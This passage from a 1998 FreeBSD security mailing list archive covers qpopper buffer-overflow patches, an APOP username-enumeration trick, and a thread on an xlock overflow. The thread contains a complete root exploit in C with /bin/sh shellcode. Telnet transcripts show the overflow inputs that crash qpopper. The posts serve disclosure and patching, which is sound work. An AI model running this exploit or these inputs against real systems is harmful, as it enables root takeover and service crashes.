"Argument %d \"%s\" (truncated) exceeds maximum permitted size.", ! i, p->pop_parm[i]); ! } ! return(-1); ! } ! } /* Delimit the token with a null */ if (*mp) *mp++ = 0; diff -p work/qpopper2.41beta1/pop_uidl.c work2/qpopper2.41beta1/pop_uidl.c *** work/qpopper2.41beta1/pop_uidl.c Wed Nov 19 14:20:38 1997 --- work2/qpopper2.41beta1/pop_uidl.c Sun Jun 28 13:09:56 1998 *************** from_hdr(p, mp) *** 101,107 **** POP *p; MsgInfoList *mp; { ! char buf[MAXLINELEN], *cp; fseek(p->drop, mp->offset, 0); while (fgets(buf, sizeof(buf), p->drop) != NULL) { --- 101,112 ---- POP *p; MsgInfoList *mp; { ! /* ! * Shorten this buffer so that an extra-long From: header ! * won't overflow the buffers in the pop_euidl() where ! * this function is called. 128 should be sufficient. ! */ ! static char buf[MAXLINELEN - 128], *cp; fseek(p->drop, mp->offset, 0); while (fgets(buf, sizeof(buf), p->drop) != NULL) { diff -p work/qpopper2.41beta1/popper.h work2/qpopper2.41beta1/popper.h *** work/qpopper2.41beta1/popper.h Sun Jun 28 12:58:15 1998 --- work2/qpopper2.41beta1/popper.h Sun Jun 28 11:56:10 1998 *************** *** 59,65 **** #define MAXMSGLINELEN MAXLINELEN #define MAXCMDLEN 4 #define MAXPARMCOUNT 5 ! #define MAXPARMLEN 10 #define ALLOC_MSGS 20 #ifndef OSF1 --- 59,65 ---- #define MAXMSGLINELEN MAXLINELEN #define MAXCMDLEN 4 #define MAXPARMCOUNT 5 ! #define MAXPARMLEN 32 /* Large enough for 32-byte APOP parm. */ #define ALLOC_MSGS 20 #ifndef OSF1 Have fun, but not too much! ;) Aaron out. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 23:32:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA15968 for freebsd-security-outgoing; Sun, 28 Jun 1998 23:32:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gilberto.physik.RWTH-Aachen.DE (gilberto.physik.rwth-aachen.de [137.226.30.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA15961 for ; Sun, 28 Jun 1998 23:32:32 -0700 (PDT) (envelope-from kuku@gilberto.physik.RWTH-Aachen.DE) Received: (from kuku@localhost) by gilberto.physik.RWTH-Aachen.DE (8.8.8/8.8.7) id IAA00836 for freebsd-security@freebsd.org; Mon, 29 Jun 1998 08:32:34 +0200 (MEST) (envelope-from kuku) Date: Mon, 29 Jun 1998 08:32:34 +0200 (MEST) From: Christoph Kukulies Message-Id: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> To: freebsd-security@FreeBSD.ORG Subject: xlock Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alarmed by recent buffer overflow attacks on Linux machines in my vicinity (an exploit for this is available) I thought about xlock under FreeBSD and would like to know whether the security hole has been sorted out under FreeBSD 2.2.x or what measures are advised to prevent it. -- Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 23:58:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA18577 for freebsd-security-outgoing; Sun, 28 Jun 1998 23:58:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ghpc8.ihf.rwth-aachen.de (ghpc8.ihf.RWTH-Aachen.DE [134.130.90.8]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA18534 for ; Sun, 28 Jun 1998 23:58:14 -0700 (PDT) (envelope-from tg@ghpc8.ihf.rwth-aachen.de) Received: from ghpc6.ihf.rwth-aachen.de (ghpc6.ihf.rwth-aachen.de [134.130.90.6]) by ghpc8.ihf.rwth-aachen.de (8.8.8/8.8.6) with ESMTP id IAA25463; Mon, 29 Jun 1998 08:58:04 +0200 (CEST) Received: (from tg@localhost) by ghpc6.ihf.rwth-aachen.de (8.8.8/8.8.5) id IAA02572; Mon, 29 Jun 1998 08:58:02 +0200 (CEST) To: Christoph Kukulies Cc: freebsd-security@FreeBSD.ORG Subject: Re: xlock References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> From: Thomas Gellekum Date: 29 Jun 1998 08:58:02 +0200 In-Reply-To: Christoph Kukulies's message of "Mon, 29 Jun 1998 08:32:34 +0200 (MEST)" Message-ID: <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de> Lines: 11 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christoph Kukulies writes: > Alarmed by recent buffer overflow attacks on Linux machines in > my vicinity (an exploit for this is available) I thought about > xlock under FreeBSD and would like to know whether the > security hole has been sorted out under FreeBSD 2.2.x or what > measures are advised to prevent it. Could you tell more about this? tg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 00:20:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA22125 for freebsd-security-outgoing; Mon, 29 Jun 1998 00:20:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gilberto.physik.RWTH-Aachen.DE (gilberto.physik.rwth-aachen.de [137.226.30.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA22116 for ; Mon, 29 Jun 1998 00:20:15 -0700 (PDT) (envelope-from kuku@gilberto.physik.RWTH-Aachen.DE) Received: (from kuku@localhost) by gilberto.physik.RWTH-Aachen.DE (8.8.8/8.8.7) id JAA00976; Mon, 29 Jun 1998 09:20:06 +0200 (MEST) (envelope-from kuku) Message-ID: <19980629092005.33214@gil.physik.rwth-aachen.de> Date: Mon, 29 Jun 1998 09:20:05 +0200 From: Christoph Kukulies To: Thomas Gellekum Cc: Christoph Kukulies , freebsd-security@FreeBSD.ORG Subject: Re: xlock References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.81e In-Reply-To: <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de>; from Thomas Gellekum on Mon, Jun 29, 1998 at 08:58:02AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote: > Christoph Kukulies writes: > > > Alarmed by recent buffer overflow attacks on Linux machines in > > my vicinity (an exploit for this is available) I thought about > > xlock under FreeBSD and would like to know whether the > > security hole has been sorted out under FreeBSD 2.2.x or what > > measures are advised to prevent it. > > Could you tell more about this? /* x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit Assumptions: xlock is suid root, and installed in /usr/X11/bin */ [complete xploit can be sent on demand] xlock, since it is suid root (I don't know which version is affected and if that is fixed maybe in XF86332) can be fed with a command line parameter causing a buffer overflow which allows a logged in normal user gaining a root shell. Actually the hole is a year old. Since I didn't find xlock on freefall (hub) I thought the problem is known already. The Linux exploit program doesn't work directly under FreeBSD (causes a bad system call) but with some tweaking it could be made to work. SUSE Linux 5.x fixes it the following way: 1.) establishing a group 'shadow' in /etc/group, sole member 'root': shadow:x:15:root 2.) xlock becomes SGID group shadow: -rwxr-sr-x 1 root shadow 843596 Nov 16 1996 /usr/X11/bin/xlock* 3.) password files become group readable by group shadow -rw-r----- 1 root shadow 289 Jan 16 1997 /etc/gshadow -rw-r----- 1 root shadow 683 Jun 15 14:55 /etc/shadow -rw-r----- 1 root shadow 683 May 14 18:09 /etc/shadow- -rw-r----- 1 root shadow 642 Sep 30 1997 /etc/shadow.orig > > tg -- --Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 00:30:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA23119 for freebsd-security-outgoing; Mon, 29 Jun 1998 00:30:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ghpc8.ihf.rwth-aachen.de (ghpc8.ihf.RWTH-Aachen.DE [134.130.90.8]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA23084 for ; Mon, 29 Jun 1998 00:29:55 -0700 (PDT) (envelope-from tg@ghpc8.ihf.rwth-aachen.de) Received: from ghpc6.ihf.rwth-aachen.de (ghpc6.ihf.rwth-aachen.de [134.130.90.6]) by ghpc8.ihf.rwth-aachen.de (8.8.8/8.8.6) with ESMTP id JAA25546; Mon, 29 Jun 1998 09:29:49 +0200 (CEST) Received: (from tg@localhost) by ghpc6.ihf.rwth-aachen.de (8.8.8/8.8.5) id JAA04551; Mon, 29 Jun 1998 09:29:47 +0200 (CEST) To: Christoph Kukulies Cc: freebsd-security@FreeBSD.ORG Subject: Re: xlock References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de> <19980629092005.33214@gil.physik.rwth-aachen.de> From: Thomas Gellekum Date: 29 Jun 1998 09:29:47 +0200 In-Reply-To: Christoph Kukulies's message of "Mon, 29 Jun 1998 09:20:05 +0200" Message-ID: <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de> Lines: 31 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christoph Kukulies writes: > On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote: > > Christoph Kukulies writes: > > > > > Alarmed by recent buffer overflow attacks on Linux machines in > > > my vicinity (an exploit for this is available) I thought about > > > xlock under FreeBSD and would like to know whether the > > > security hole has been sorted out under FreeBSD 2.2.x or what > > > measures are advised to prevent it. > > > > Could you tell more about this? > > /* x86 XLOCK overflow exploit > by cesaro@0wned.org 4/17/97 > > Original exploit framework - lpr exploit > > Usage: make xlock-exploit > xlock-exploit > > Assumptions: xlock is suid root, and installed in /usr/X11/bin > */ > > [complete xploit can be sent on demand] Please do. Desmond Bagley, the maintainer of xlockmore mentioned a security hole in Mesa with suid binaries. I don't know if it's the same problem. tg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 01:02:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA26087 for freebsd-security-outgoing; Mon, 29 Jun 1998 01:02:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from infowest.com (infowest.com [204.17.177.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA26082 for ; Mon, 29 Jun 1998 01:02:13 -0700 (PDT) (envelope-from agifford@infowest.com) Received: from infowest.com (liberty.infowest.com [207.49.60.254]) by infowest.com (8.8.8/8.8.8) with ESMTP id CAA06195; Mon, 29 Jun 1998 02:01:11 -0600 (MDT) Message-ID: <359749BB.8A412952@infowest.com> Date: Mon, 29 Jun 1998 02:00:59 -0600 From: "Aaron D. Gifford" X-Mailer: Mozilla 4.05 [en] (X11; U; FreeBSD 2.2.6-STABLE i386) MIME-Version: 1.0 To: bugtraq@netspace.org CC: John Fraizer , security@FreeBSD.ORG Subject: Re: More problems with QPOPPER - References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org John Fraizer wrote: > > After applying all the patches with exception of the PAM patch in the > .RPM'd version of qpopper2.4.src, > I have located yet another hole in qpopper. > > This popper was compiled with -DAUTH in the makefile. > > Connecting to the popper and sending a line of garbage will now generate > the maximum permitted size > error. Providing an INVALID username and sending a line of garbage (1000+ > chars), does not segfault. I > was beginning to relax. > > [OverKill]:/$ telnet localhost pop3 > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > +OK QPOP (version 2.4) at Victim.Com starting. > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > -ERR Command "xxxxxxxxxxxxxxxxx" (truncated) exceedes maximum permitted > size. > user blah > +OK Password required for blah. > pass > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > -ERR Password supplied for "blah" is incorrect. > +OK Pop server at Victim.Com signing off. > Connection closed by foreign host. > > I decided to try a long username: > > [OverKill]:/$ telnet localhost pop3 > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > +OK QPOP (version 2.4) at Victim.Com starting. > user > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > -ERR Argument 1 "xxxxxxxxxxxxxxxxx" (truncated) exceeds maximum permitted > size. > > Handled it just fine. > > Then, I decided to try a VALID username: > > [OverKill]:/$ telnet localhost pop3 > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > +OK QPOP (version 2.4) at Victim.Com starting. > user valid > +OK Password required for valid. > pass > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > Connection closed by foreign host. > > It segfaulted and dumped core. > > Damnit, Jim, I'm a Doctor not a C programmer! I have managed to locate > the portion of the code that is bypassing the " -ERR Command > "xxxxxxxxxxxxxxxxx" (truncated) exceedes maximum permitted size. " code > from the installed patches: > > In pop_parse.c, we find: > > /* > * This is kinda gross. Passwords have to be parsed diffrently > * as they may contain spaces. If you think of a cleaner way, > * do it. The "p->pop_command[0] == 'p'" is so save a call to > * strcmp() on ever call to pop_parse(); This parsing keeps > * leading and trailing speces behind for the password command. > */ > if(p->pop_command[0] == 'p' && strcmp(p->pop_command,"pass") == > 0) { > if (*mp != 0) { > p->pop_parm[1] = mp; > if (strlen(mp) > 0) { > mp = mp + strlen(mp) - 1; > while (*mp == 0xa || *mp == 0xd) *mp-- = 0; > } > > Looks like basically that if the parser sees that the command was actually > a password argument, it doesn't send it through the truncate code. Looks like qpopper after the "if(p->pop_command..." bit assumes everything else in the buffer is the password except any trailing CR/LF characters, which it removes. I cannot understand the "if (strlen(mp) > 0) {" test, because the previous "if (*mp != 0) {" test should guarantee that strlen() will always at least return 1. For those who want to be consistent about limiting argument length using MAXPARMLEN, you can try this snippit instead of the above existing snippit in pop_parse.c: if(p->pop_command[0] == 'p' && strcmp(p->pop_command,"pass") == 0) { if (*mp != 0) { if (strlen(mp) > MAXPARMLEN) { mp[MAXPARMLEN] = '\0'; pop_msg(p,POP_FAILURE, "Argument %d \"%s\" (truncated) exceeds maximum permitted size.", i+1, mp); return(-1); } p->pop_parm[1] = mp; mp = mp + strlen(mp) - 1; while (*mp == 0xa || *mp == 0xd) *mp-- = 0; return(1); } else return (-1); } PLEASE be aware that you need a large enough MAXPARMLEN defined in popper.h to handle large passwords or APOP depending on your individual needs. I've been using 32 on my system, which should permit APOP to work. Another fun qpopper trivia fact for the security conscious: While looking at the APOP stuff, I see that it is possible to glean valid user names from sites using certain configurations of qpopper with APOP support. For example: localhost# telnet localhost 110 +OK QPOP (version 2.41beta1) at localhost starting. <18115.899106609@localhost> APOP bogus-user 1638de71888f8c3ff023ac5c38621211 -ERR Password supplied for "bogus" is incorrect. +OK Pop server at localhost signing off. Connection closed by foreign host. localhost# telnet localhost 110 +OK QPOP (version 2.41beta1) at localhost starting. <18119.899106628@localhost> APOP real-user 8463af56e9a5d72cc84012ad7748f92c -ERR not authorized +OK Pop server at localhost signing off. Connection closed by foreign host. localhost# Nice. In some cases where APOP support is compiled in but the APOP database does not exist, the error message on a valid user might be "-ERR POP authorization DB not available (real-user)" instead of the "-ERR not authorized" message. I don't know if this would work for sites with properly configured APOP or not. It worked on my own machine which does NOT use APOP but had APOP compiled in by default. Aaron out. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 01:34:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03458 for freebsd-security-outgoing; Mon, 29 Jun 1998 01:34:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gilberto.physik.RWTH-Aachen.DE (gilberto.physik.rwth-aachen.de [137.226.30.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA03452 for ; Mon, 29 Jun 1998 01:34:50 -0700 (PDT) (envelope-from kuku@gilberto.physik.RWTH-Aachen.DE) Received: (from kuku@localhost) by gilberto.physik.RWTH-Aachen.DE (8.8.8/8.8.7) id KAA01164; Mon, 29 Jun 1998 10:17:18 +0200 (MEST) (envelope-from kuku) Message-ID: <19980629101718.52752@gil.physik.rwth-aachen.de> Date: Mon, 29 Jun 1998 10:17:18 +0200 From: Christoph Kukulies To: Thomas Gellekum Cc: Christoph Kukulies , freebsd-security@FreeBSD.ORG Subject: Re: xlock References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de> <19980629092005.33214@gil.physik.rwth-aachen.de> <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.81e In-Reply-To: <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de>; from Thomas Gellekum on Mon, Jun 29, 1998 at 09:29:47AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jun 29, 1998 at 09:29:47AM +0200, Thomas Gellekum wrote: > Christoph Kukulies writes: > > > On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote: > > > Christoph Kukulies writes: > > > > > > > Alarmed by recent buffer overflow attacks on Linux machines in > > > > my vicinity (an exploit for this is available) I thought about > > > > xlock under FreeBSD and would like to know whether the > > > > security hole has been sorted out under FreeBSD 2.2.x or what > > > > measures are advised to prevent it. > > > > > > Could you tell more about this? > > > > /* x86 XLOCK overflow exploit > > by cesaro@0wned.org 4/17/97 > > > > Original exploit framework - lpr exploit > > > > Usage: make xlock-exploit > > xlock-exploit > > > > Assumptions: xlock is suid root, and installed in /usr/X11/bin > > */ > > > > [complete xploit can be sent on demand] OK, here goes: (This is for Linux 2.x, xlock path and code on stack may vary for FreeBSD if applicable). --8<---------------------------------------------------------------------- /* x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); } --8<---------------------------------------------------------------------- > > Please do. Desmond Bagley, the maintainer of xlockmore mentioned a > security hole in Mesa with suid binaries. I don't know if it's the > same problem. > > tg -- Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon 